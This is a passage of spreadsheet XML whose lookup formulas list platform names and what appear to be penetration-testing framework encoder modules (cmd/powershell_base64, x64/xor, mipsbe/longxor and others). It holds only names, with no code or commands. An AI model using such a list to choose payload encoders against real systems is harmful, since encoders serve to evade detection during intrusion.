      <c r="L58" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K58),$K$53:$K$97,0)),"")</f>
        <v>cmd/powershell_base64</v>
      </c>
      <c r="M58" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q58" s="130" t="s">
        <v>21942</v>
      </c>
      <c r="R58" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S58" s="131" t="str">
        <f>IF(R58=1,COUNTIF($R$53:R58,1),"")</f>
        <v/>
      </c>
      <c r="T58" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S58),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U58" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="59" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A59" s="130" t="s">
        <v>21943</v>
      </c>
      <c r="B59" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C59" s="131" t="str">
        <f>IF(B59=1,COUNTIF($B$53:B59,1),"")</f>
        <v/>
      </c>
      <c r="D59" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C59),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E59" s="130" t="s">
        <v>21944</v>
      </c>
      <c r="F59" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G59" s="131">
        <f>IF(F59=1,COUNTIF($F$53:F59,1),"")</f>
        <v>7</v>
      </c>
      <c r="H59" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G59),$G$53:$G$84,0)),"")</f>
        <v>cisco</v>
      </c>
      <c r="I59" s="130" t="s">
        <v>21945</v>
      </c>
      <c r="J59" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K59" s="131">
        <f>IF(J59=1,COUNTIF($J$53:J59,1),"")</f>
        <v>7</v>
      </c>
      <c r="L59" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K59),$K$53:$K$97,0)),"")</f>
        <v>cmd/printf_php_mq</v>
      </c>
      <c r="M59" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q59" s="130" t="s">
        <v>21946</v>
      </c>
      <c r="R59" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S59" s="131" t="str">
        <f>IF(R59=1,COUNTIF($R$53:R59,1),"")</f>
        <v/>
      </c>
      <c r="T59" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S59),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U59" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="60" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A60" s="130" t="s">
        <v>21947</v>
      </c>
      <c r="B60" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C60" s="131" t="str">
        <f>IF(B60=1,COUNTIF($B$53:B60,1),"")</f>
        <v/>
      </c>
      <c r="D60" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C60),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E60" s="130" t="s">
        <v>4957</v>
      </c>
      <c r="F60" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G60" s="131">
        <f>IF(F60=1,COUNTIF($F$53:F60,1),"")</f>
        <v>8</v>
      </c>
      <c r="H60" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G60),$G$53:$G$84,0)),"")</f>
        <v>firefox</v>
      </c>
      <c r="I60" s="130" t="s">
        <v>21948</v>
      </c>
      <c r="J60" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K60" s="131">
        <f>IF(J60=1,COUNTIF($J$53:J60,1),"")</f>
        <v>8</v>
      </c>
      <c r="L60" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K60),$K$53:$K$97,0)),"")</f>
        <v>generic/eicar</v>
      </c>
      <c r="M60" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q60" s="130" t="s">
        <v>21949</v>
      </c>
      <c r="R60" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S60" s="131" t="str">
        <f>IF(R60=1,COUNTIF($R$53:R60,1),"")</f>
        <v/>
      </c>
      <c r="T60" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S60),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U60" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="61" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A61" s="130" t="s">
        <v>21950</v>
      </c>
      <c r="B61" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C61" s="131" t="str">
        <f>IF(B61=1,COUNTIF($B$53:B61,1),"")</f>
        <v/>
      </c>
      <c r="D61" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C61),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E61" s="130" t="s">
        <v>21951</v>
      </c>
      <c r="F61" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G61" s="131">
        <f>IF(F61=1,COUNTIF($F$53:F61,1),"")</f>
        <v>9</v>
      </c>
      <c r="H61" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G61),$G$53:$G$84,0)),"")</f>
        <v>freebsd</v>
      </c>
      <c r="I61" s="130" t="s">
        <v>21952</v>
      </c>
      <c r="J61" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K61" s="131">
        <f>IF(J61=1,COUNTIF($J$53:J61,1),"")</f>
        <v>9</v>
      </c>
      <c r="L61" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K61),$K$53:$K$97,0)),"")</f>
        <v>generic/none</v>
      </c>
      <c r="M61" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q61" s="130" t="s">
        <v>21953</v>
      </c>
      <c r="R61" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S61" s="131" t="str">
        <f>IF(R61=1,COUNTIF($R$53:R61,1),"")</f>
        <v/>
      </c>
      <c r="T61" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S61),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U61" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="62" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A62" s="130" t="s">
        <v>21954</v>
      </c>
      <c r="B62" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C62" s="131" t="str">
        <f>IF(B62=1,COUNTIF($B$53:B62,1),"")</f>
        <v/>
      </c>
      <c r="D62" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C62),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E62" s="130" t="s">
        <v>21955</v>
      </c>
      <c r="F62" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G62" s="131">
        <f>IF(F62=1,COUNTIF($F$53:F62,1),"")</f>
        <v>10</v>
      </c>
      <c r="H62" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G62),$G$53:$G$84,0)),"")</f>
        <v>hardware</v>
      </c>
      <c r="I62" s="130" t="s">
        <v>21956</v>
      </c>
      <c r="J62" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K62" s="131">
        <f>IF(J62=1,COUNTIF($J$53:J62,1),"")</f>
        <v>10</v>
      </c>
      <c r="L62" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K62),$K$53:$K$97,0)),"")</f>
        <v>mipsbe/byte_xori</v>
      </c>
      <c r="M62" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q62" s="130" t="s">
        <v>21957</v>
      </c>
      <c r="R62" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S62" s="131" t="str">
        <f>IF(R62=1,COUNTIF($R$53:R62,1),"")</f>
        <v/>
      </c>
      <c r="T62" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S62),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U62" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="63" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A63" s="130" t="s">
        <v>21958</v>
      </c>
      <c r="B63" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C63" s="131" t="str">
        <f>IF(B63=1,COUNTIF($B$53:B63,1),"")</f>
        <v/>
      </c>
      <c r="D63" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C63),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E63" s="130" t="s">
        <v>21959</v>
      </c>
      <c r="F63" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G63" s="131">
        <f>IF(F63=1,COUNTIF($F$53:F63,1),"")</f>
        <v>11</v>
      </c>
      <c r="H63" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G63),$G$53:$G$84,0)),"")</f>
        <v>hpux</v>
      </c>
      <c r="I63" s="130" t="s">
        <v>21960</v>
      </c>
      <c r="J63" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K63" s="131">
        <f>IF(J63=1,COUNTIF($J$53:J63,1),"")</f>
        <v>11</v>
      </c>
      <c r="L63" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K63),$K$53:$K$97,0)),"")</f>
        <v>mipsbe/longxor</v>
      </c>
      <c r="M63" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q63" s="130" t="s">
        <v>21961</v>
      </c>
      <c r="R63" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S63" s="131" t="str">
        <f>IF(R63=1,COUNTIF($R$53:R63,1),"")</f>
        <v/>
      </c>
      <c r="T63" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S63),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U63" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="64" spans="1:26" x14ac:dyDescent="0.25">
      <c r="A64" s="130" t="s">
        <v>21962</v>
      </c>
      <c r="B64" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C64" s="131" t="str">
        <f>IF(B64=1,COUNTIF($B$53:B64,1),"")</f>
        <v/>
      </c>
      <c r="D64" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C64),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E64" s="130" t="s">
        <v>21963</v>
      </c>
      <c r="F64" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G64" s="131">
        <f>IF(F64=1,COUNTIF($F$53:F64,1),"")</f>
        <v>12</v>
      </c>
      <c r="H64" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G64),$G$53:$G$84,0)),"")</f>
        <v>irix</v>
      </c>
      <c r="I64" s="130" t="s">
        <v>21964</v>
      </c>
      <c r="J64" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K64" s="131">
        <f>IF(J64=1,COUNTIF($J$53:J64,1),"")</f>
        <v>12</v>
      </c>
      <c r="L64" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K64),$K$53:$K$97,0)),"")</f>
        <v>mipsle/byte_xori</v>
      </c>
      <c r="M64" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q64" s="130" t="s">
        <v>21965</v>
      </c>
      <c r="R64" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S64" s="131" t="str">
        <f>IF(R64=1,COUNTIF($R$53:R64,1),"")</f>
        <v/>
      </c>
      <c r="T64" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S64),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U64" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="65" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A65" s="130" t="s">
        <v>21966</v>
      </c>
      <c r="B65" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C65" s="131" t="str">
        <f>IF(B65=1,COUNTIF($B$53:B65,1),"")</f>
        <v/>
      </c>
      <c r="D65" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C65),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E65" s="130" t="s">
        <v>21967</v>
      </c>
      <c r="F65" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G65" s="131">
        <f>IF(F65=1,COUNTIF($F$53:F65,1),"")</f>
        <v>13</v>
      </c>
      <c r="H65" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G65),$G$53:$G$84,0)),"")</f>
        <v>java</v>
      </c>
      <c r="I65" s="130" t="s">
        <v>21968</v>
      </c>
      <c r="J65" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K65" s="131">
        <f>IF(J65=1,COUNTIF($J$53:J65,1),"")</f>
        <v>13</v>
      </c>
      <c r="L65" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K65),$K$53:$K$97,0)),"")</f>
        <v>mipsle/longxor</v>
      </c>
      <c r="M65" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q65" s="130" t="s">
        <v>21917</v>
      </c>
      <c r="R65" s="131">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="S65" s="131">
        <f>IF(R65=1,COUNTIF($R$53:R65,1),"")</f>
        <v>1</v>
      </c>
      <c r="T65" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S65),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U65" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="66" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A66" s="130" t="s">
        <v>21969</v>
      </c>
      <c r="B66" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C66" s="131" t="str">
        <f>IF(B66=1,COUNTIF($B$53:B66,1),"")</f>
        <v/>
      </c>
      <c r="D66" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C66),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E66" s="130" t="s">
        <v>21970</v>
      </c>
      <c r="F66" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G66" s="131">
        <f>IF(F66=1,COUNTIF($F$53:F66,1),"")</f>
        <v>14</v>
      </c>
      <c r="H66" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G66),$G$53:$G$84,0)),"")</f>
        <v>javascript</v>
      </c>
      <c r="I66" s="130" t="s">
        <v>21971</v>
      </c>
      <c r="J66" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K66" s="131">
        <f>IF(J66=1,COUNTIF($J$53:J66,1),"")</f>
        <v>14</v>
      </c>
      <c r="L66" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K66),$K$53:$K$97,0)),"")</f>
        <v>php/base64</v>
      </c>
      <c r="M66" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q66" s="130" t="s">
        <v>21972</v>
      </c>
      <c r="R66" s="131">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="S66" s="131">
        <f>IF(R66=1,COUNTIF($R$53:R66,1),"")</f>
        <v>2</v>
      </c>
      <c r="T66" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S66),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U66" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="67" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A67" s="130" t="s">
        <v>21973</v>
      </c>
      <c r="B67" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C67" s="131" t="str">
        <f>IF(B67=1,COUNTIF($B$53:B67,1),"")</f>
        <v/>
      </c>
      <c r="D67" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C67),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E67" s="130" t="s">
        <v>21974</v>
      </c>
      <c r="F67" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G67" s="131">
        <f>IF(F67=1,COUNTIF($F$53:F67,1),"")</f>
        <v>15</v>
      </c>
      <c r="H67" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G67),$G$53:$G$84,0)),"")</f>
        <v>juniper</v>
      </c>
      <c r="I67" s="130" t="s">
        <v>21975</v>
      </c>
      <c r="J67" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K67" s="131">
        <f>IF(J67=1,COUNTIF($J$53:J67,1),"")</f>
        <v>15</v>
      </c>
      <c r="L67" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K67),$K$53:$K$97,0)),"")</f>
        <v>ppc/longxor</v>
      </c>
      <c r="M67" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q67" s="130" t="s">
        <v>21976</v>
      </c>
      <c r="R67" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S67" s="131" t="str">
        <f>IF(R67=1,COUNTIF($R$53:R67,1),"")</f>
        <v/>
      </c>
      <c r="T67" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S67),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U67" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="68" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A68" s="130" t="s">
        <v>21977</v>
      </c>
      <c r="B68" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C68" s="131" t="str">
        <f>IF(B68=1,COUNTIF($B$53:B68,1),"")</f>
        <v/>
      </c>
      <c r="D68" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C68),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E68" s="130" t="s">
        <v>21978</v>
      </c>
      <c r="F68" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G68" s="131">
        <f>IF(F68=1,COUNTIF($F$53:F68,1),"")</f>
        <v>16</v>
      </c>
      <c r="H68" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G68),$G$53:$G$84,0)),"")</f>
        <v>linux</v>
      </c>
      <c r="I68" s="130" t="s">
        <v>21979</v>
      </c>
      <c r="J68" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K68" s="131">
        <f>IF(J68=1,COUNTIF($J$53:J68,1),"")</f>
        <v>16</v>
      </c>
      <c r="L68" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K68),$K$53:$K$97,0)),"")</f>
        <v>ppc/longxor_tag</v>
      </c>
      <c r="M68" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q68" s="130" t="s">
        <v>21980</v>
      </c>
      <c r="R68" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S68" s="131" t="str">
        <f>IF(R68=1,COUNTIF($R$53:R68,1),"")</f>
        <v/>
      </c>
      <c r="T68" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S68),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U68" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="69" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A69" s="130" t="s">
        <v>21981</v>
      </c>
      <c r="B69" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C69" s="131" t="str">
        <f>IF(B69=1,COUNTIF($B$53:B69,1),"")</f>
        <v/>
      </c>
      <c r="D69" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C69),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E69" s="130" t="s">
        <v>21982</v>
      </c>
      <c r="F69" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G69" s="131">
        <f>IF(F69=1,COUNTIF($F$53:F69,1),"")</f>
        <v>17</v>
      </c>
      <c r="H69" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G69),$G$53:$G$84,0)),"")</f>
        <v>mainframe</v>
      </c>
      <c r="I69" s="130" t="s">
        <v>21983</v>
      </c>
      <c r="J69" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K69" s="131">
        <f>IF(J69=1,COUNTIF($J$53:J69,1),"")</f>
        <v>17</v>
      </c>
      <c r="L69" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K69),$K$53:$K$97,0)),"")</f>
        <v>ruby/base64</v>
      </c>
      <c r="M69" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q69" s="130" t="s">
        <v>21984</v>
      </c>
      <c r="R69" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S69" s="131" t="str">
        <f>IF(R69=1,COUNTIF($R$53:R69,1),"")</f>
        <v/>
      </c>
      <c r="T69" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S69),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U69" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="70" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A70" s="130" t="s">
        <v>21985</v>
      </c>
      <c r="B70" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C70" s="131" t="str">
        <f>IF(B70=1,COUNTIF($B$53:B70,1),"")</f>
        <v/>
      </c>
      <c r="D70" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C70),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E70" s="130" t="s">
        <v>21986</v>
      </c>
      <c r="F70" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G70" s="131">
        <f>IF(F70=1,COUNTIF($F$53:F70,1),"")</f>
        <v>18</v>
      </c>
      <c r="H70" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G70),$G$53:$G$84,0)),"")</f>
        <v>multi</v>
      </c>
      <c r="I70" s="130" t="s">
        <v>21987</v>
      </c>
      <c r="J70" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K70" s="131">
        <f>IF(J70=1,COUNTIF($J$53:J70,1),"")</f>
        <v>18</v>
      </c>
      <c r="L70" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K70),$K$53:$K$97,0)),"")</f>
        <v>sparc/longxor_tag</v>
      </c>
      <c r="M70" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q70" s="130" t="s">
        <v>21988</v>
      </c>
      <c r="R70" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S70" s="131" t="str">
        <f>IF(R70=1,COUNTIF($R$53:R70,1),"")</f>
        <v/>
      </c>
      <c r="T70" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S70),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U70" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="71" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A71" s="130" t="s">
        <v>21989</v>
      </c>
      <c r="B71" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C71" s="131" t="str">
        <f>IF(B71=1,COUNTIF($B$53:B71,1),"")</f>
        <v/>
      </c>
      <c r="D71" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C71),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E71" s="130" t="s">
        <v>21990</v>
      </c>
      <c r="F71" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G71" s="131">
        <f>IF(F71=1,COUNTIF($F$53:F71,1),"")</f>
        <v>19</v>
      </c>
      <c r="H71" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G71),$G$53:$G$84,0)),"")</f>
        <v>netbsd</v>
      </c>
      <c r="I71" s="130" t="s">
        <v>21991</v>
      </c>
      <c r="J71" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K71" s="131">
        <f>IF(J71=1,COUNTIF($J$53:J71,1),"")</f>
        <v>19</v>
      </c>
      <c r="L71" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K71),$K$53:$K$97,0)),"")</f>
        <v>x64/xor</v>
      </c>
      <c r="M71" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q71" s="130" t="s">
        <v>21992</v>
      </c>
      <c r="R71" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S71" s="131" t="str">
        <f>IF(R71=1,COUNTIF($R$53:R71,1),"")</f>
        <v/>
      </c>
      <c r="T71" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S71),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U71" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="72" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A72" s="130" t="s">
        <v>21993</v>
      </c>
      <c r="B72" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C72" s="131" t="str">
        <f>IF(B72=1,COUNTIF($B$53:B72,1),"")</f>
        <v/>
      </c>
      <c r="D72" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C72),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E72" s="130" t="s">
        <v>21994</v>
      </c>
      <c r="F72" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G72" s="131">
        <f>IF(F72=1,COUNTIF($F$53:F72,1),"")</f>
        <v>20</v>
      </c>
      <c r="H72" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G72),$G$53:$G$84,0)),"")</f>
        <v>netware</v>
      </c>
      <c r="I72" s="130" t="s">
        <v>21995</v>
      </c>
      <c r="J72" s="131">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="K72" s="131">
        <f>IF(J72=1,COUNTIF($J$53:J72,1),"")</f>
        <v>20</v>
      </c>
      <c r="L72" s="132" t="str">
        <f>IFERROR(INDEX($I$53:$I$97,MATCH(ROWS($K$53:K72),$K$53:$K$97,0)),"")</f>
        <v>x64/xor_context</v>
      </c>
      <c r="M72" s="129" t="s">
        <v>269</v>
      </c>
      <c r="Q72" s="130" t="s">
        <v>21996</v>
      </c>
      <c r="R72" s="131">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="S72" s="131" t="str">
        <f>IF(R72=1,COUNTIF($R$53:R72,1),"")</f>
        <v/>
      </c>
      <c r="T72" s="132" t="str">
        <f>IFERROR(INDEX($Q$53:$Q$104,MATCH(ROWS($S$53:S72),$S$53:$S$104,0)),"")</f>
        <v/>
      </c>
      <c r="U72" s="129" t="s">
        <v>269</v>
      </c>
    </row>
    <row r="73" spans="1:21" x14ac:dyDescent="0.25">
      <c r="A73" s="130" t="s">
        <v>21997</v>
      </c>
      <c r="B73" s="131">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C73" s="131" t="str">
        <f>IF(B73=1,COUNTIF($B$53:B73,1),"")</f>
        <v/>
      </c>
      <c r="D73" s="132" t="str">
        <f>IFERROR(INDEX($A$53:$A$618,MATCH(ROWS($C$53:C73),$C$53:$C$618,0)),"")</f>
        <v/>
      </c>
      <c r="E73" s="130" t="s">
        <v>21998</v>
      </c>
      <c r="F73" s="131">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="G73" s="131">
        <f>IF(F73=1,COUNTIF($F$53:F73,1),"")</f>
        <v>21</v>
      </c>
      <c r="H73" s="131" t="str">
        <f>IFERROR(INDEX($E$53:$E$84,MATCH(ROWS($G$53:G73),$G$53:$G$84,0)),"")</f>
        <v>nodejs</v>
      </c>
